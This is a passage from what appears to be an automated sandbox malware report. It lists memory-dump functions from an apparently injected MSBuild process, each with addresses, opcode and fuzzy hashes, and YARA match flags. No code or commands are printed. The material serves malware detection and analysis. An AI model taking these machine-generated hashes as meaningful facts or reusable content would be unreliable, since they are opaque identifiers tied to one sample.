                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4ad8b8fd37d788a29adcdf12b7b38658e7b1303bb87699a463990dc9e14147bc
                                                                                                                                                                                                                                                                  • Instruction ID: 16754927839671dd4344e8d9d3fecec4a9ba012106dd68752aa819dd0f062fd9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ad8b8fd37d788a29adcdf12b7b38658e7b1303bb87699a463990dc9e14147bc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D02F2346006518BF724CF2ED450B7ABBF1AF84300B05819BF996DB3A2D7B4E846DB60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0145B16B Relevance: .4, Instructions: 450COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b2185a056e4c3cfe1e951a1a2f206a769321a271afad180583ae3a6ebc0abbe1
                                                                                                                                                                                                                                                                  • Instruction ID: 70afcfaa056a8e04303c357450cd080fb7b81e44dd284e0ec9cf4f41530ea294
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2185a056e4c3cfe1e951a1a2f206a769321a271afad180583ae3a6ebc0abbe1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF11572E006158BCB58CF6DC99067EFFF6EF98210719416ED856EB392E634EA01CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 00402FB0 Relevance: .4, Instructions: 435COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                                                                                                                  • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0145A9A6 Relevance: .4, Instructions: 425COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 395a5d570814bd2312111760e1d93a66b8bb41527aab29325988cef30a71fcfd
                                                                                                                                                                                                                                                                  • Instruction ID: c6470256c1a47224c089ab08c4b82e84d3e2d34a212ee044e4c7b485f6f26b30
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 395a5d570814bd2312111760e1d93a66b8bb41527aab29325988cef30a71fcfd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F1F473E005269BCB59CE68C5A05BEFFF1AF54210B29426AD952EB392D734DE41CB80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041DED4 Relevance: .4, Instructions: 392COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b8f5637e57134dda7f3fb8d2fad2e2e094c70f1af60f7e6258fc83ec03756961
                                                                                                                                                                                                                                                                  • Instruction ID: 9a70455af4a427856ffa6b0c113a45acb20bc9596edf39decebc4ff8488a072e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8f5637e57134dda7f3fb8d2fad2e2e094c70f1af60f7e6258fc83ec03756961
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE126572909391CFD716DF38C99AB813FB1F792724B08428EC9A1975D6D338215ACF89
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AFDC0 Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a9f98b95875fc32a276f823d5b735a2b6d0b3aca4df4f48e41d9ace4c108bff4
                                                                                                                                                                                                                                                                  • Instruction ID: 73d7351fc6051cbf71af7434a4b636b7114e7b8ed3cecb38ee914e57e666da8a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9f98b95875fc32a276f823d5b735a2b6d0b3aca4df4f48e41d9ace4c108bff4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF1407090020ADFDF19DFACC580BAEB7B5FF44308F1485A9EA15AB256E734DA45CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013865D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 418d9a0bb13c38021577d5004da84bc26c37a36a223c6629da63a9a2b2c76ee9
                                                                                                                                                                                                                                                                  • Instruction ID: 81de43cca1336cf38d80b5c55a6d7154594d79393af9a23a0e791f667510ecd2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 418d9a0bb13c38021577d5004da84bc26c37a36a223c6629da63a9a2b2c76ee9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE190B1508342CFC715EF28C490A6ABBE1FF89318F05896DF99997351E731E905CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01378397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: fa1ed6a6cd64cd8fc0f55ecc4a04e73124c5cb3a844fcbcbbb8e3529dfbc23d0
                                                                                                                                                                                                                                                                  • Instruction ID: c2eead4a5791a56abd327185e7a59864c6ce3a87f0992337ed9d2ba9bf781fb9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa1ed6a6cd64cd8fc0f55ecc4a04e73124c5cb3a844fcbcbbb8e3529dfbc23d0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CD1F672A0020ADBDB24DF29C884ABEB7B5FF5431CF05466DEA16DB284E738D951CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041DB1E Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 746c943184e53b1934f594c990f6d650a5370f6275ff1211c43c7e661e0a3540
                                                                                                                                                                                                                                                                  • Instruction ID: eba585da97ab3d01b5fa0d3079a246584260c101ffd8456a6237e16633096e80
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 746c943184e53b1934f594c990f6d650a5370f6275ff1211c43c7e661e0a3540
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1123072909791CFD712DF38C88AB423FB1F796324B48428EC9A1935D2D738216ADF49
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AC6E0 Relevance: .4, Instructions: 367COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 69801e574c32c5bba559aa8f7ca2e5d53fe1da0077f16ef19058a5a1cd648f3c
                                                                                                                                                                                                                                                                  • Instruction ID: bcf1ac9efcddd51e1430459c88e1e9d77e56268afabcc0eed04775dbbc0bfdb5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69801e574c32c5bba559aa8f7ca2e5d53fe1da0077f16ef19058a5a1cd648f3c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98D19D31E042198BEF28CF8CC5953BDBFB9FB44318F94A02AD516EB685C7748941CB45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013938E0 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e3d5902bc55757dfdb581a20285740736dbb3f6b7dae0f8b75dee9bb2e125891
                                                                                                                                                                                                                                                                  • Instruction ID: 6a1c7f5f9f5082fd43e7c588f377a3b38a6187f8a3271875d9dade77392a3018
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3d5902bc55757dfdb581a20285740736dbb3f6b7dae0f8b75dee9bb2e125891
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1E1AEB5A00219CFDB18CF69C880AAEBBF5FF58314F258159E955EB391D730EA41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AD2F0 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                                                                                                                                                                                                                  • Instruction ID: d9601af5287170212085aafdb8db757c1577c3ab92cb126be06176de20e59315
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FB16C22A1062487EB1D8A58C8A53BD2797EFD5318F5DC279C9175FFE9CA788D018341
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0139F460 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f3bf60dbc1364e06487d3c9b1c342e8d2ec5a0ec5ed94dd18740ac5791463989
                                                                                                                                                                                                                                                                  • Instruction ID: 1ed1f30e48c6e4ed4dcce7c1437bbeeb47b96a59a69b13cf8fa35f67f58f4981
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3bf60dbc1364e06487d3c9b1c342e8d2ec5a0ec5ed94dd18740ac5791463989
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AC1E172A01215CBEF25CF2CC4907B97FAAFB4472CF1A4169ED42DB2A6D7349940CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01390535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                                  • Instruction ID: 72e91ee86884c97725e0390660d70c875f1d523438166a4cea45c04dacc95d71
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEB11531604756EFDF25CBA8C854BBEBBFAAF88218F144159E652D7281DB30ED41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A90DB Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: bedec5b1a419b02edda4c04a380503749c0ecbe4a5d62477de05fa4e5e137757
                                                                                                                                                                                                                                                                  • Instruction ID: 3fa4ac5b18b9bdfffba2b64d3fe83dbef55d4766a3a350f1c36636e1eec1ce01
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bedec5b1a419b02edda4c04a380503749c0ecbe4a5d62477de05fa4e5e137757
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7A14B7190061AAFEF229FA8CC45BAE7BB9EF45758F414054FA00AB2A0D7759C41CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013883C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c9601dd5e314396cddaa5bc94079e246369a1977dcbf92fc955d811047d9921f
                                                                                                                                                                                                                                                                  • Instruction ID: bc879d21d5634143f9540a97024c6491907c8d6018ed66ac95074f9a3293306f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9601dd5e314396cddaa5bc94079e246369a1977dcbf92fc955d811047d9921f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03C16874208341CFE760DF19C484BABB7E5BF88308F44496DE98997291E774E908CFA2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 770db7f0ccbbaa3bf4bedf98d855fa2921a1f3445db97ae57085baf47210d6b1
                                                                                                                                                                                                                                                                  • Instruction ID: 8192c7520290db58a6182fe690a0c4355faefb7c2925be0a15d02b908aa0eda4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 770db7f0ccbbaa3bf4bedf98d855fa2921a1f3445db97ae57085baf47210d6b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89B18271A0026A8BDB34CF69C890BA9B7B5EF44718F0485E9D54AE7241EB35DD85CF20
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d821d8b2313db6b841f51654952f444fdaf333a477d7fbd26d01ca3fecd32aba
                                                                                                                                                                                                                                                                  • Instruction ID: 90aaba0f1e7f5b462bc631f93f57a2dc10ea37c094b40bcc636424956ba481aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d821d8b2313db6b841f51654952f444fdaf333a477d7fbd26d01ca3fecd32aba
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5A1E471E007699FEF21DB5CC848BAEBBB8EB0471CF150125EA11AB2D1D7B49D40CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C0185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0b0039bb9e86a98feb614b1c7005c3ffb5c36023f3bafd13ab89b8ca730829a3
                                                                                                                                                                                                                                                                  • Instruction ID: 47ab83233d2c5a60400840346316d462dad62bb7c7f1a905e5bdce36989f6a36
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b0039bb9e86a98feb614b1c7005c3ffb5c36023f3bafd13ab89b8ca730829a3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CA1CF75B0065ADBDB29DF69C990BAAB7B5FF54B2CF04402DFA05A7281DB34AC11CB40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01454500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5a27f241fa82e22ec4d7cba76f5eab2509ca1472697c4bd942ff511c7aff2fc3
                                                                                                                                                                                                                                                                  • Instruction ID: 40fadd8b944d4c8d916c5eb24cc53b932544a65d72275c0f015c0f5e3617e85d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a27f241fa82e22ec4d7cba76f5eab2509ca1472697c4bd942ff511c7aff2fc3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BA1E072604602EFDB51DF18C980B5ABBE5FF48708F09052AE9499B762E334ED81CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014060E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8dfbff16d765628810bf455bba6c6ca565c3b628620a47f9925adce584720513
                                                                                                                                                                                                                                                                  • Instruction ID: e4fdaad5400ee9e4867c77c21816d7b5273075eeecb7296602b5b5ea67ee55f6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dfbff16d765628810bf455bba6c6ca565c3b628620a47f9925adce584720513
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A291A571D00216AFDF16DF69D880BBEBFB5AF48710F16416AE611EB3A1D734D9108BA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041D9EC Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 85c550d57d7d04e976de9f4033cd2d17a53dcbcbf37ae774952b7b3b7c6bfbf8
